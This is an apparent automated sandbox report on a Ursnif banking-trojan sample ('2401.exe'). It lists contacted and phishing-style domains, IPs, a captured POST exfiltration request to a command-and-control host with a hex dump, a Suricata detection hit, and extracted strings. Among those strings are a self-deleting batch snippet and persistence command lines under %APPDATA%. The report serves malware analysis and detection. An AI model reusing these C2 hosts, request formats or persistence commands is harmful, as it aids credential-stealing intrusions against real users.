Domain mrbin.biz Threat Level - Positives - Last Resolved 11/16/2016 00:00:00 VirusTotal Report	mrbin.biz	-	-	11/16/2016 00:00:00	Report
Domain kumbayapacala.com Threat Level - Positives - Last Resolved 11/13/2016 00:00:00 VirusTotal Report	kumbayapacala.com	-	-	11/13/2016 00:00:00	Report
Domain usetheanygrantsentire.ru Threat Level - Positives - Last Resolved 11/01/2016 00:00:00 VirusTotal Report	usetheanygrantsentire.ru	-	-	11/01/2016 00:00:00	Report
Domain com-cgi-bin-page-78462-accesd-desjardins.com Threat Level - Positives - Last Resolved 10/25/2016 00:00:00 VirusTotal Report	com-cgi-bin-page-78462-accesd-desjardins.com	-	-	10/25/2016 00:00:00	Report
Domain com-html-page-47735-accesd-desjardins.com Threat Level - Positives - Last Resolved 10/25/2016 00:00:00 VirusTotal Report	com-html-page-47735-accesd-desjardins.com	-	-	10/25/2016 00:00:00	Report

80
TCP

explorer.exe
PID: 1948

Ukraine
ASN: 24962 (Telesystems of Ukraine LLC)

148.163.112.203
OSINT

Associated Artifacts for 148.163.112.203

Details	Associated URL	Threat Level	Positives	Scan Date	VirusTotal
Associated URL http://148.163.112.203/ Threat Level suspicious Positives 1/68 Scan Date 01/19/2017 09:12:27 VirusTotal -	http://148.163.112.203/	suspicious	1/68	01/19/2017 09:12:27	-

22045
TCP

explorer.exe
PID: 1948

United States
ASN: 53755 (Input Output Flood LLC)

Port Protocol Description
Port 80: Hypertext Transfer Protocol (HTTP)

Contacted Countries

HTTP Traffic

Endpoint

Request

URL

Data

77.91.144.64:80

POST

/images/T5bBOV8l85Qk1/m8Wl9syM/yPg5RYaxlJ8t4CrLMAkdkSy/b0JDQA4Xqq/1aYEyJL_2Fnsujt5c/5mv7Me0nN3_2/BvKyV5_2Bqg/bp9V0946G0tkea/Htr7...

POST /images/T5bBOV8l85Qk1/m8Wl9syM/yPg5RYaxlJ8t4CrLMAkdkSy/b0JDQA4Xqq/1aYEyJL_2Fnsujt5c/5mv7Me0nN3_2/BvKyV5_2Bqg/bp9V0946G0tkea/Htr779_2FUYQgiM_2FgOU/pt19z1zdnUczVV5_/2Fyb9bXrj8t/8HEEp3.bmp HTTP/1.1 Content-Type: multipart/form-data; boundary=397127342909960221985636 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Host: kgnene199meiwww.com Content-Length: 415 Connection: Keep-Alive Cache-Control: no-cache More Details

Format

Details

Converted

POST /images/T5bBOV8l85Qk1/m8Wl9syM/yPg5RYaxlJ8t4CrLMAkdkSy/b0JDQA4Xqq/1aYEyJL_2Fnsujt5c/5mv7Me0nN3_2/BvKyV5_2Bqg/bp9V0946G0tkea/Htr779_2FUYQgiM_2FgOU/pt19z1zdnUczVV5_/2Fyb9bXrj8t/8HEEp3.bmp HTTP/1.1
Content-Type: multipart/form-data; boundary=397127342909960221985636
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Host: kgnene199meiwww.com
Content-Length: 415
Connection: Keep-Alive
Cache-Control: no-cache

--397127342909960221985636 Content-Disposition: form-data; name="upload_file"; filename="9087.bin" Content-Type: application/octet-stream

Hex View

     0 : 0A 00 27 00 00 00 0A 00 27 7B 44 9D 08 00 45 00 [..'.....'{D...E.]
    10 : 03 79 00 E4 40 00 80 06 20 4C C0 A8 38 0B 4D 5B [.y..@... L..8.M[]
    20 : 90 40 CB 4E 00 50 82 59 79 3A 14 1E 93 4F 50 18 [.@.N.P.Yy:...OP.]
    30 : 40 29 00 98 00 00 50 4F 53 54 20 2F 69 6D 61 67 [@)....POST /imag]
    40 : 65 73 2F 54 35 62 42 4F 56 38 6C 38 35 51 6B 31 [es/T5bBOV8l85Qk1]
    50 : 2F 6D 38 57 6C 39 73 79 4D 2F 79 50 67 35 52 59 [/m8Wl9syM/yPg5RY]
    60 : 61 78 6C 4A 38 74 34 43 72 4C 4D 41 6B 64 6B 53 [axlJ8t4CrLMAkdkS]
    70 : 79 2F 62 30 4A 44 51 41 34 58 71 71 2F 31 61 59 [y/b0JDQA4Xqq/1aY]
    80 : 45 79 4A 4C 5F 32 46 6E 73 75 6A 74 35 63 2F 35 [EyJL_2Fnsujt5c/5]
    90 : 6D 76 37 4D 65 30 6E 4E 33 5F 32 2F 42 76 4B 79 [mv7Me0nN3_2/BvKy]
    A0 : 56 35 5F 32 42 71 67 2F 62 70 39 56 30 39 34 36 [V5_2Bqg/bp9V0946]
    B0 : 47 30 74 6B 65 61 2F 48 74 72 37 37 39 5F 32 46 [G0tkea/Htr779_2F]
    C0 : 55 59 51 67 69 4D 5F 32 46 67 4F 55 2F 70 74 31 [UYQgiM_2FgOU/pt1]
    D0 : 39 7A 31 7A 64 6E 55 63 7A 56 56 35 5F 2F 32 46 [9z1zdnUczVV5_/2F]
    E0 : 79 62 39 62 58 72 6A 38 74 2F 38 48 45 45 70 33 [yb9bXrj8t/8HEEp3]
    F0 : 2E 62 6D 70 20 48 54 54 50 2F 31 2E 31 0D 0A 43 [.bmp HTTP/1.1..C]
   100 : 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 6D 75 6C [ontent-Type: mul]
   110 : 74 69 70 61 72 74 2F 66 6F 72 6D 2D 64 61 74 61 [tipart/form-data]
   120 : 3B 20 62 6F 75 6E 64 61 72 79 3D 33 39 37 31 32 [; boundary=39712]
   130 : 37 33 34 32 39 30 39 39 36 30 32 32 31 39 38 35 [7342909960221985]
   140 : 36 33 36 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A [636..User-Agent:]
   150 : 20 4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F [ Mozilla/4.0 (co]
   160 : 6D 70 61 74 69 62 6C 65 3B 20 4D 53 49 45 20 38 [mpatible; MSIE 8]
   170 : 2E 30 3B 20 57 69 6E 64 6F 77 73 20 4E 54 20 36 [.0; Windows NT 6]
   180 : 2E 31 29 0D 0A 48 6F 73 74 3A 20 6B 67 6E 65 6E [.1)..Host: kgnen]
   190 : 65 31 39 39 6D 65 69 77 77 77 2E 63 6F 6D 0D 0A [e199meiwww.com..]
   1A0 : 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 [Content-Length: ]
   1B0 : 34 31 35 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A [415..Connection:]
   1C0 : 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A 43 61 63 [ Keep-Alive..Cac]
   1D0 : 68 65 2D 43 6F 6E 74 72 6F 6C 3A 20 6E 6F 2D 63 [he-Control: no-c]
   1E0 : 61 63 68 65 0D 0A 0D 0A 2D 2D 33 39 37 31 32 37 [ache....--397127]
   1F0 : 33 34 32 39 30 39 39 36 30 32 32 31 39 38 35 36 [3429099602219856]
   200 : 33 36 0D 0A 43 6F 6E 74 65 6E 74 2D 44 69 73 70 [36..Content-Disp]
   210 : 6F 73 69 74 69 6F 6E 3A 20 66 6F 72 6D 2D 64 61 [osition: form-da]
   220 : 74 61 3B 20 6E 61 6D 65 3D 22 75 70 6C 6F 61 64 [ta; name="upload]
   230 : 5F 66 69 6C 65 22 3B 20 66 69 6C 65 6E 61 6D 65 [_file"; filename]
   240 : 3D 22 39 30 38 37 2E 62 69 6E 22 0D 0A 43 6F 6E [="9087.bin"..Con]
   250 : 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C 69 [tent-Type: appli]
   260 : 63 61 74 69 6F 6E 2F 6F 63 74 65 74 2D 73 74 72 [cation/octet-str]
   270 : 65 61 6D 0D 0A 0D 0A FC 60 1C 22 80 A6 01 31 9D [eam.....`."...1.]
   280 : CA FE 84 0E 46 2E 92 08 4E CB 44 B3 C1 9E 24 67 [....F...N.D...$g]
   290 : D0 ED E1 3F EA B8 7D 18 08 25 F8 CE EE 14 4E BB [...?..}..%....N.]
   2A0 : A9 FF 2C AD B8 10 AF 5B 7A 07 F2 AC B8 B5 1F 94 [..,....[z.......]
   2B0 : 0E B1 71 45 DB 29 46 86 9F 85 1D 30 0A 96 2F AB [..qE.)F....0../.]
   2C0 : 89 F5 36 60 0D 67 06 A6 A0 05 16 15 B0 14 93 38 [..6`.g.........8]
   2D0 : FF 3F 29 91 96 F1 46 FC 5D BE DE AC 65 F7 75 05 [.?)...F.]...e.u.]
   2E0 : 9A 4E 16 64 E7 77 E5 A8 07 BA 4C 1E 48 01 [.N.d.w....L.H.]

Emerging Threats

Event	Category	Description	SID
77.91.144.64:80 (TCP)	A Network Trojan was detected	ET TROJAN Ursnif Variant CnC Data Exfil	2021830

ET rules applied using Suricata.

Extracted Strings

All Details: Download All Memory Strings (13KiB)

!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~

Ansi based on Memory/File Scan (2401.exe.bin)

!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~

Ansi based on Memory/File Scan (2401.exe.bin)

!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~

Ansi based on Memory/File Scan (2401.exe.bin)

!This program cannot be run in DOS mode.$

Ansi based on Memory/File Scan (2401.exe.bin)

"C:\2401.exe"

Ansi based on Process Commandline (adprtext.exe)

# Mozilla User Preferences/* Do not edit this file. * * If you make changes to this file while the application is running, * the changes will be overwritten when the application exits. * * To make a manual change to preferences, you can visit the URL about:config */user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);user_pref("app.update.migrated.updateDir", true);user_pref("browser.cache.disk.capacity", 358400);user_pref("browser.cache.disk.smart_size.first_run", false);user_pref("browser.cache.frecency_experiment", 4);user_pref("browser.download.importedFromSqlite", true);user_pref("browser.download.panel.shown", true);user_pref("browser.migration.version", 24);user_pref("browser.newtabpage.enhanced", true);user_pref("browser.newtabpage.introShown", true);user_pref("browser.newtabpage.storageVersion", 1);user_pref("browser.pagethumbnails.storage_version", 3);user_pref("browser.places.smartBookmarksVersion", 7);user_pref("browser.rights.3.shown", true);user_pref("browser.search.isUS", false);user_pref("browser.sessionstore.upgradeBackup.latestBuildID", "20150122214805");user_pref("browser.slowStartup.averageTime", 2051);user_pref("browser.slowStartup.samples", 2);user_pref("browser.startup.homepage_override.buildID", "20150122214805");user_pref("browser.startup.homepage_override.mstone", "35.0.1");user_pref("browser.taskbar.lastgroupid", "308046B0AF4A39CB");user_pref("browser.uiCustomization.state", "{\"placements\":{\"PanelUI-contents\":[\"edit-controls\",\"zoom-controls\",\"new-window-button\",\"privatebrowsing-button\",\"save-page-button\",\"print-button\",\"history-panelmenu\",\"fullscreen-button\",\"find-button\",\"preferences-button\",\"add-ons-button\",\"developer-button\"],\"addon-bar\":[\"addonbar-closebutton\",\"status-bar\"],\"PersonalToolbar\":[\"personal-bookmarks\"],\"nav-bar\":[\"urlbar-container\",\"search-container\",\"bookmarks-menu-button\",\"downloads-button\",\"home-button\",\"loop-button-throttled\"],\"TabsToolbar\":[\"tabbrowser-tabs\",\"new-tab-button\",\"alltabs-button\"],\"toolbar-menubar\":[\"menubar-items\"]},\"seen\":[],\"dirtyAreaCache\":[\"PersonalToolbar\",\"nav-bar\",\"TabsToolbar\",\"toolbar-menubar\"],\"currentVersion\":3,\"newElementCount\":0}");user_pref("datareporting.healthreport.currentDaySubmissionFailureCount", 1);user_pref("datareporting.healthreport.lastDataSubmissionFailureTime", "1461273464441");user_pref("datareporting.healthreport.lastDataSubmissionRequestedTime", "1461273462087");user_pref("datareporting.healthreport.nextDataSubmissionTime", "1461274364442");user_pref("datareporting.healthreport.service.firstRun", true);user_pref("datareporting.policy.dataSubmissionPolicyAcceptedVersion", 2);user_pref("datareporting.policy.dataSubmissionPolicyNotifiedTime", "1460755731046");user_pref("datareporting.policy.firstRunTime", "1460755684396");user_pref("datareporting.sessions.current.activeTicks", 14);user_pref("datareporting.sessions.current.clean", true);user_pref("datareporting.sessions.current.firstPaint", 2002);user_pref("datareporting.sessions.current.main", 423);user_pref("datareporting.sessions.current.sessionRestored", 2575);user_pref("datareporting.sessions.current.startTime", "1461273395766");user_pref("datareporting.sessions.current.totalTime", 78);user_pref("datareporting.sessions.currentIndex", 6);user_pref("datareporting.sessions.prunedIndex", 5);user_pref("dom.mozApps.used", true);user_pref("extensions.blocklist.pingCountVersion", 0);user_pref("extensions.bootstrappedAddons", "{}");user_pref("extensions.databaseSchema", 16);user_pref("extensions.enabledAddons", "%7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:35.0.1");user_pref("extensions.getAddons.databaseSchema", 5);user_pref("extensions.lastAppVersion", "35.0.1");user_pref("extensions.lastPlatformVersion", "35.0.1");user_pref("extensions.pendingOperations", false);user_pref("extensions.shownSelectionUI", true);user_pref("extensions.xpiState", "{\"app-global\":{\"{972ce4c6-7e08-4474-a285-3208198ce6fd}\":{\"d\":\"C:\\\\Program Files\\\\Mozilla Firefox\\\\browser\\\\extensions\\\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\",\"e\":true,\"v\":\"35.0.1\",\"st\":1424004302312,\"mt\":1421999039000}}}");user_pref("gecko.buildID", "20150122214805");user_pref("gecko.mstone", "35.0.1");user_pref("loop.soft_start_ticket_number", 10331766);user_pref("loop.throttled2", false);user_pref("network.cookie.prefsMigrated", true);user_pref("pdfjs.migrationVersion", 2);user_pref("pdfjs.previousHandler.alwaysAskBeforeHandling", true);user_pref("pdfjs.previousHandler.preferredAction", 4);user_pref("places.database.lastMaintenance", 1461273463);user_pref("places.history.expiration.transient_current_max_pages", 53676);user_pref("plugin.disable_full_page_plugin_for_types", "application/pdf");user_pref("plugin.importedState", true);user_pref("privacy.sanitize.migrateFx3Prefs", true);user_pref("signon.importedFromSqlite", true);user_pref("toolkit.startup.last_success", 1461273396);user_pref("toolkit.telemetry.previousBuildID", "20150122214805");user_pref("network.http.spdy.enabled", false);

Ansi based on Dropped File (prefs.js)

%1, %2. Block size: %3.[Detected that journal is located on separate volume. Results may not contain deleted files.

Unicode based on Memory/File Scan (2401.exe.bin)

%WINDIR%\Explorer.EXE

Ansi based on Process Commandline (explorer.exe)

&%A e1\!(

Ansi based on Memory/File Scan (2401.exe.bin)

'/W'@B9C(

Ansi based on Memory/File Scan (2401.exe.bin)

'N?gn7<B(:Z

Ansi based on Memory/File Scan (2401.exe.bin)

(%s%.4x)

Unicode based on Memory/File Scan (2401.exe.bin)

(%s%.8x)%s.

Unicode based on Memory/File Scan (2401.exe.bin)

(%s)

Unicode based on Memory/File Scan (2401.exe, 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

((((( H

Unicode based on Memory/File Scan (2401.exe.bin)

(null)

Unicode based on Memory/File Scan (2401.exe, 00018221-00002356.00000002.24716.0041A000.00000002.mdmp)

)~M;^G,/+

Ansi based on Memory/File Scan (2401.exe.bin)

.?AVbad_alloc@std@@

Ansi based on Memory/File Scan (2401.exe.bin)

.?AVbad_exception@std@@

Ansi based on Memory/File Scan (2401.exe.bin)

.?AVexception@std@@

Ansi based on Memory/File Scan (2401.exe.bin)

.?AVlength_error@std@@

Ansi based on Memory/File Scan (2401.exe.bin)

.?AVlogic_error@std@@

Ansi based on Memory/File Scan (2401.exe.bin)

.?AVout_of_range@std@@

Ansi based on Memory/File Scan (2401.exe.bin)

.?AVtype_info@@

Ansi based on Memory/File Scan (2401.exe.bin)

.Unexpected variant or safe array error: %s%.8x,

Unicode based on Memory/File Scan (2401.exe.bin)

/* Do not edit this file.

Ansi based on Dropped File (prefs.js)

/images/T5bBOV8l85Qk1/m8Wl9syM/yPg5RYaxlJ8t4CrLMAkdkSy/b0JDQA4Xqq/1aYEyJL_2Fnsujt5c/5mv7Me0nN3_2/BvKyV5_2Bqg/bp9V0946G0tkea/Htr779_2FUYQgiM_2FgOU/pt19z1zdnUczVV5_/2Fyb9bXrj8t/8HEEp3.bmp

Ansi based on PCAP Processing (PCAP)

2401.exe

Unicode based on Runtime Data (2401.exe)

25-01-2017 02:45:01

Ansi based on Dropped File (01D276F955CEADB00B)

25-01-2017 02:45:01%WINDIR%\Explorer.EXEAltTab

Ansi based on Dropped File (01D276F955CEADB00B)

28E3.bat

Unicode based on Runtime Data (2401.exe)

7.94.8

Unicode based on Memory/File Scan (2401.exe, 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

77.91.144.64

Ansi based on PCAP Processing (PCAP)

:3872611if not exist %1 goto 4291094684cmd /C "%1 %2"if errorlevel 1 goto 3872611:4291094684del %0

Ansi based on Runtime Data (2401.exe)

:5yK:RK8.Ib

Ansi based on Memory/File Scan (2401.exe.bin)

:DC33:""$8

Ansi based on Memory/File Scan (2401.exe.bin)

;L>(.a5A B

Ansi based on Memory/File Scan (2401.exe.bin)

<+t(<-t$:

Ansi based on Memory/File Scan (2401.exe.bin)

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="Nooblet" version="5.0.0.0"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="AsInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo></assembly>PAD

Ansi based on Memory/File Scan (2401.exe.bin)

@.data

Ansi based on Memory/File Scan (2401.exe.bin)

\Sessions\1\Windows\ApiPort

Unicode based on Runtime Data (2401.exe)

\ThemeApiPort

Unicode based on Runtime Data (2401.exe)

]_yz,^[#(zH

Ansi based on Memory/File Scan (2401.exe.bin)

`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (2401.exe)

`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (2401.exe)

`dS,0&t}@

Ansi based on Memory/File Scan (2401.exe.bin)

`local static guard'

Ansi based on Memory/File Scan (2401.exe.bin)

`local static thread guard'

Ansi based on Memory/File Scan (2401.exe.bin)

`local vftable constructor closure'

Ansi based on Memory/File Scan (2401.exe.bin)

`local vftable'

Ansi based on Memory/File Scan (2401.exe.bin)

`placement delete[] closure'

Ansi based on Memory/File Scan (2401.exe.bin)

A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates

Unicode based on Memory/File Scan (2401.exe.bin)

A3Xd][lna

Ansi based on Memory/File Scan (2401.exe.bin)

account{A770D234-3A38-4244-88F4-7A867FDC9959}.oeaccount

Unicode based on Runtime Data (explorer.exe)

Address already in use. Cannot assign requested address.

Unicode based on Memory/File Scan (2401.exe.bin)

adprtext.exe

Unicode based on Runtime Data (adprtext.exe)

ATS@xJ,OI}X

Ansi based on Memory/File Scan (2401.exe.bin)

AvayaliveDrilled.exe

Unicode based on Memory/File Scan (2401.exe.bin)

AVIStreamGetFrame

Ansi based on Memory/File Scan (2401.exe.bin)

AVIStreamGetFrameClose

Ansi based on Memory/File Scan (2401.exe.bin)

AVIStreamGetFrameOpen

Ansi based on Memory/File Scan (2401.exe.bin)

Bi.-kc2(Z

Ansi based on Memory/File Scan (2401.exe.bin)

BuXg@XT]G

Ansi based on Memory/File Scan (2401.exe.bin)

C:\2401.exe

Ansi based on Hybrid Analysis (2401.exe, 00018221-00002356.00000002.24716.00401000.00000020.mdmp)

C:\Ensoniq\pots\Infrastructures\TB.pdb

Ansi based on Memory/File Scan (2401.exe.bin)

%APPDATA%\cmdisvc6\adprtext.exe

Unicode based on Runtime Data (2401.exe)

CaptionFont.Name

Ansi based on Memory/File Scan (2401.exe.bin)

cmd /C ""%APPDATA%\cmdisvc6\adprtext.exe" "C:\2401.exe""

Ansi based on Process Commandline (cmd.exe)

cmd /c ""%APPDATA%\cmdisvc6\adprtext.exe" "C:\2401.exe""

Ansi based on Process Commandline (cmd.exe)

cmd /C "%1 %2"

Ansi based on Dropped File (28E3.bat)

COMCTL32.dll

Ansi based on Memory/File Scan (2401.exe.bin)

command

Unicode based on Runtime Data (2401.exe)

Connection reset by peer.

Unicode based on Memory/File Scan (2401.exe.bin)

CryptUIWizImport

Ansi based on Memory/File Scan (2401.exe.bin)

d.exe

Unicode based on Memory/File Scan (2401.exe, 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

delete[]

Ansi based on Memory/File Scan (2401.exe.bin)

DisableLocalOverride

Unicode based on Runtime Data (2401.exe)

dm1.frmstyle1CaptionHeight

Ansi based on Memory/File Scan (2401.exe.bin)

Error creating window class+Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'

Unicode based on Memory/File Scan (2401.exe.bin)

f`wwwwwGDGwwwwwGDGw

Ansi based on Memory/File Scan (2401.exe.bin)

Font.Name

Ansi based on Memory/File Scan (2401.exe.bin)

GetCommandLineA

Ansi based on Memory/File Scan (2401.exe.bin)

GetCPInfo

Ansi based on Memory/File Scan (2401.exe.bin)

GetCurrentProcess

Ansi based on Memory/File Scan (2401.exe.bin)

GetCurrentProcessId

Ansi based on Memory/File Scan (2401.exe.bin)

GetCursorInfo

Ansi based on Memory/File Scan (2401.exe.bin)

GetLastError

Ansi based on Memory/File Scan (2401.exe.bin)

GetLocaleInfoA

Ansi based on Memory/File Scan (2401.exe.bin)

GetMenuItemInfoA

Ansi based on Memory/File Scan (2401.exe.bin)

GetProcAddress

Ansi based on Memory/File Scan (2401.exe.bin)

GetProcessHeap

Ansi based on Memory/File Scan (2401.exe.bin)

GetProcessWindowStation

Ansi based on Memory/File Scan (2401.exe.bin)

GetServiceKeyNameA

Ansi based on Memory/File Scan (2401.exe.bin)

GetStartupInfoA

Ansi based on Memory/File Scan (2401.exe.bin)

GetUserObjectInformationA

Ansi based on Memory/File Scan (2401.exe.bin)

GetWindowThreadProcessId

Ansi based on Memory/File Scan (2401.exe.bin)

Graph.CombineMode

Ansi based on Memory/File Scan (2401.exe.bin)

h(((( H

Unicode based on Memory/File Scan (2401.exe.bin)

HH:mm:ss

Ansi based on Memory/File Scan (2401.exe.bin)

I!(.&

Ansi based on Memory/File Scan (2401.exe, 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

I/O error %d

Unicode based on Memory/File Scan (2401.exe.bin)

ImgBack.CombineMode

Ansi based on Memory/File Scan (2401.exe.bin)

ImgBtn.CombineMode

Ansi based on Memory/File Scan (2401.exe.bin)

ImgCaption.CombineMode

Ansi based on Memory/File Scan (2401.exe.bin)

ImgExtra.CombineMode

Ansi based on Memory/File Scan (2401.exe.bin)

ImgLogo.CombineMode

Ansi based on Memory/File Scan (2401.exe.bin)

Invalid count (%d)

Unicode based on Memory/File Scan (2401.exe.bin)

Invalid destination array"Character index out of bounds (%d)

Unicode based on Memory/File Scan (2401.exe.bin)

Invalid destination index (%d)

Unicode based on Memory/File Scan (2401.exe.bin)

Invalid ImageList Index)Failed to read ImageList data from stream(Failed to write ImageList data to stream$Error creating window device context

Unicode based on Memory/File Scan (2401.exe.bin)

l6Ooo/YYY)S(

Ansi based on Memory/File Scan (2401.exe.bin)

lbKeyFrameMouseDown

Ansi based on Memory/File Scan (2401.exe.bin)

lbKeyFrameMouseEnter

Ansi based on Memory/File Scan (2401.exe.bin)

lbKeyFrameMouseLeave

Ansi based on Memory/File Scan (2401.exe.bin)

Local

Unicode based on Runtime Data (2401.exe)

LocalizedName

Unicode based on Runtime Data (2401.exe)

LocalRedirectOnly

Unicode based on Runtime Data (2401.exe)

m>hu\:M<

Ansi based on Memory/File Scan (2401.exe.bin)

MM/dd/yy

Ansi based on Memory/File Scan (2401.exe.bin)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)

Ansi based on PCAP Processing (PCAP)

mscoree.dll

Unicode based on Memory/File Scan (2401.exe.bin)

Network is unreachable. Net dropped connection or reset.!Software caused connection abort.

Unicode based on Memory/File Scan (2401.exe.bin)

new[]

Ansi based on Memory/File Scan (2401.exe.bin)

PEyRK|_(@

Ansi based on Memory/File Scan (2401.exe.bin)

PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD

Ansi based on Memory/File Scan (2401.exe, 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

Protocol family not supported.0Address family not supported by protocol family.

Unicode based on Memory/File Scan (2401.exe.bin)

Protocol not supported.

Unicode based on Memory/File Scan (2401.exe.bin)

pwwwwppwwwp

Ansi based on Memory/File Scan (2401.exe.bin)

qZQ*{Q!j,

Ansi based on Memory/File Scan (2401.exe.bin)

R6002- floating point support not loaded

Ansi based on Memory/File Scan (2401.exe.bin)

R6031- Attempt to initialize the CRT more than once.This indicates a bug in your application.

Ansi based on Memory/File Scan (2401.exe.bin)

R6032- not enough space for locale information

Ansi based on Memory/File Scan (2401.exe.bin)

R6033- Attempt to use MSIL code from this assembly during native code initializationThis indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.

Ansi based on Memory/File Scan (2401.exe.bin)

R6034An application has made an attempt to load the C runtime library incorrectly.Please contact the application's support team for more information.

Ansi based on Memory/File Scan (2401.exe.bin)

Runtime Error!Program:

Ansi based on Memory/File Scan (2401.exe.bin)

Shadow copy (%1) (%2)

Unicode based on Memory/File Scan (2401.exe.bin)

Shadow copy of drive (%1) (%2)

Unicode based on Memory/File Scan (2401.exe.bin)

SHGetFileInfoA

Ansi based on Memory/File Scan (2401.exe.bin)

Skipped SSD driveiFiles you are going to overwrite might be located on a SSD drive (%1). Are you sure you want to continue?&Continue

Unicode based on Memory/File Scan (2401.exe.bin)

Socket is not connected..Cannot send or receive after socket is closed.

Unicode based on Memory/File Scan (2401.exe.bin)

Socket type not supported."Operation not supported on socket.

Unicode based on Memory/File Scan (2401.exe.bin)

Start index out of bounds (%d)

Unicode based on Memory/File Scan (2401.exe.bin)

SupportMouseOverDown

Ansi based on Memory/File Scan (2401.exe.bin)

SupportWin7AutoSize

Ansi based on Memory/File Scan (2401.exe.bin)

TDRadioButtonrbInsertA

Ansi based on Memory/File Scan (2401.exe.bin)

TDRadioButtonrbInsertB

Ansi based on Memory/File Scan (2401.exe.bin)

Techsupport RequestTTY

Ansi based on Memory/File Scan (2401.exe.bin)

The file being readed is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corruped, try obtaining it again.nThis "Portable Network Graphics" image is not supported or it might be invalid.(IHDR chunk is not the first)

Unicode based on Memory/File Scan (2401.exe.bin)

Unicode based on Memory/File Scan (2401.exe, 00018221-00002356.00000002.24716.00425000.00000002.mdmp)

There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.]The program tried to add a existent critical chunk to the current image which is not allowed.IIt's not allowed to add a new chunk because the current image is invalid.OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.oThe "Portable Network Graphics" could not be created because invalid image type parameters have being provided.&Cannot change the size of a JPEG image"Character index out of bounds (%d)

Unicode based on Memory/File Scan (2401.exe.bin)

This "Portable Network Graphics" image is not supported because either it's width or height exceeds the maximum size, which is 65535 pixels length.

Unicode based on Memory/File Scan (2401.exe.bin)

This application has requested the Runtime to terminate it in an unusual way.Please contact the application's support team for more information.

Ansi based on Memory/File Scan (2401.exe.bin)

TLabellbKeyFrame

Ansi based on Memory/File Scan (2401.exe.bin)

TNearestResamplerSupportReSize

Ansi based on Memory/File Scan (2401.exe.bin)

Unsupported clipboard format

Unicode based on Memory/File Scan (2401.exe.bin)

user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);

Ansi based on Dropped File (prefs.js)

user_pref("app.update.migrated.updateDir", true);

Ansi based on Dropped File (prefs.js)

user_pref("browser.cache.disk.capacity", 358400);

Ansi based on Dropped File (prefs.js)

user_pref("browser.cache.disk.smart_size.first_run", false);

Ansi based on Dropped File (prefs.js)

user_pref("browser.cache.frecency_experiment", 4);

Ansi based on Dropped File (prefs.js)

user_pref("browser.download.importedFromSqlite", true);

Ansi based on Dropped File (prefs.js)

user_pref("browser.download.panel.shown", true);

Ansi based on Dropped File (prefs.js)

user_pref("browser.migration.version", 24);

Ansi based on Dropped File (prefs.js)

user_pref("browser.newtabpage.enhanced", true);

Ansi based on Dropped File (prefs.js)

user_pref("browser.newtabpage.introShown", true);

Ansi based on Dropped File (prefs.js)

user_pref("browser.newtabpage.storageVersion", 1);

Ansi based on Dropped File (prefs.js)

user_pref("browser.pagethumbnails.storage_version", 3);

Ansi based on Dropped File (prefs.js)

user_pref("browser.places.smartBookmarksVersion", 7);

Ansi based on Dropped File (prefs.js)

user_pref("browser.rights.3.shown", true);

Ansi based on Dropped File (prefs.js)

user_pref("browser.search.isUS", false);

Ansi based on Dropped File (prefs.js)

user_pref("browser.sessionstore.upgradeBackup.latestBuildID", "20150122214805");

Ansi based on Dropped File (prefs.js)

user_pref("browser.slowStartup.averageTime", 2051);

Ansi based on Dropped File (prefs.js)

user_pref("browser.slowStartup.samples", 2);

Ansi based on Dropped File (prefs.js)

user_pref("browser.startup.homepage_override.buildID", "20150122214805");

Ansi based on Dropped File (prefs.js)

user_pref("browser.startup.homepage_override.mstone", "35.0.1");

Ansi based on Dropped File (prefs.js)

user_pref("browser.taskbar.lastgroupid", "308046B0AF4A39CB");

Ansi based on Dropped File (prefs.js)

